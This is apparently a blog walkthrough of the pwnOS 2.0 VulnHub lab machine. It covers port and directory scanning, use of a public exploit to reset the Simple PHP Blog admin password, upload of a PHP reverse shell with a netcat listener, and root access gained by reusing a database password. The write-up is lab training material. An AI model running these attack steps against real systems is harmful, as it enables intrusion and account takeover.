Setup

Attacker(kali):10.10.10.128

VulnHub Link:https://www.vulnhub.com/entry/pwnos-20-pre-release,34/

VM Network:VMnet3(Custom)

Enumeration

Host Enumeration

Use the arp-scan to find the vm's IP address: sudo arp-scan -l

Get the BOX's IP :10.10.10.100

Port Enumeration

Perform a quick port enumeration with rustscan: rustscan -a 10.10.10.100

Full scan with nmap: nmap -A -p- 10.10.10.100 -oN nmap.txt

# Nmap 7.93 scan initiated Tue May  2 19:45:29 2023 as: nmap -A -p- -oN nmap.txt 10.10.10.100
Nmap scan report for 10.10.10.100
Host is up (0.00087s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.8p1 Debian 1ubuntu3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 85d32b0109427b204e30036dd18f95ff (DSA)
|   2048 307a319a1bb817e715df89920ecd5828 (RSA)
|_  256 1012644b7dff6a87372638b1449fcf5e (ECDSA)
80/tcp open  http    Apache httpd 2.2.17 ((Ubuntu))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Welcome to this Site!
|_http-server-header: Apache/2.2.17 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue May  2 19:45:38 2023 -- 1 IP address (1 host up) scanned in 9.92 seconds

Directory Enumeration

Use gobuster to perform a directory bruteforce:gobuster dir -u http://10.10.10.100 -t 100 -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt

http://10.10.10.100/index
http://10.10.10.100/info
http://10.10.10.100/login
http://10.10.10.100/register
http://10.10.10.100/includes/
http://10.10.10.100/blog/

Check the pages and find out the /info page is a phpinfo page:

And it looks like I got a blog available:

Foothold

I got the blog app version through view-source, it's Simple PHP Blog 0.4.0:

Check if there any public exploits: searchsploit simple php blog 0.4.0

In order to avoid Metasploit, I copy the 1191.pl out with the command searchsploit -m 1191

Run the script may got some error, it could be fixed with the follow command:

sudo apt-get install libswitch-perl

After fix that, run the script again to learn the usage:

Run with the follow command to change the admin's password:

./1191.pl -h http://10.10.10.100/blog -e 3 -U admin -P admin

Login the /blog and use the Upload Image to upload the reverse shell:

The shell's path is /blog/images:

Setup a listening with nc on kali: nc -lvnp 5555

Then click the php-reverse-shell.php and i would get the reverse shell:

Privilege Escalation

I found the mysql root password in /var/www/mysqli_connect.php:

Try to login to the ssh with it, failed:

But then I got another password in /var/mysqli_connect.php:

And that's available:

Finally

There is no flag in this box. You get root, You win.

It's a easy box, but it will be worth coming back to later to look for other methods to get root.

文章作者: z0sen
版权声明: 本站所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 z0sen's Blog
Walkthrough Linux VulnHub
喜欢就支持一下吧